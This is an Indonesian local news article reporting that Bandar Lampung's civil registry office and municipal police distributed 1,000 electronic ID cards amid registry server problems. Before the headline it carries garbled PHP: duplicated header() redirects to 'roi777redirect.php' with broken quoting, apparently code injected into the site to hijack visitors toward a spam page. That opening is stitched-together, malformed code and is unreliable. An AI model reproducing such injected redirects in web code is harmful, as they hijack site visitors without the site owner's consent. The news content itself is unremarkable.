header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Disdukcapil-Banpol PP Bagikan 1.000 Keping E-KTP -
Disdukcapil-Banpol PP Bagikan 1.000 Keping E-KTP

TRANSLAMPUNG.COM, BANDARLAMPUNG – Dinas Kependudukan dan Catatan Sipil (Disdukcapil) Kota Bandarlampung bersama Badan Polisi Pamong Praja (Banpol PP) setempat, membagikan 1.000 keping KTP elektronik (e-KTP).

Menurut Kepala Dinas Kependudukan dan Catatan Sipil Kota Bandarlampung, Zainudin, hal itu sesuai dengan perintah Wali Kota Bandarlampung Herman HN untuk memberikan pelayanan kepada masyarakat.

“Mulai hari ini (kemarin) pegawai langsung melakukan perekaman KTP elektronik di gedung baru. Dua loket kita buka dan langsung direkam,” ujarnya, Rabu (3/1).

Pelayanan perekaman langsung diberikan surat keterangan (Suket) karena datanya dikirim ke server adminduk.

“Kendala kita ketika koneksi servernya rusak. Ada 512 kabupaten/kota se-Indonesia yang ikut juga dalam perekaman ke server, termasuk Bandarlampung. Itu karena sudah 11 ribu yang direkam dan ditambah seribu jadi 12 ribu,” tuturnya.

Zainudin menerangkan, saat itu juga perekaman yang sudah jadi dengan pencetakan langsung dibagikan ke masyarakat.

“Sesuai dengan perintah Wali Kota Bandarlampung untuk memberikan pelayanan secepatnya. Ini dibantu dengan Pol PP yang akan membagikan langsung ke masyarakat,” imbuhnya.

Dari seribu, yang dibagikan sebanyak 700 dan sisanya nanti 300 dari perekaman.

“Terima kasih atas bantuan anggota Pol PP Bandarlampung yang juga ikut membantu, atas perintah Pak Wali Kota. Ini program Pak Herman HN, agar masyarakat secepatnya menerima pelayanan,” kata Zainudin. (jef/rus)

News Reporter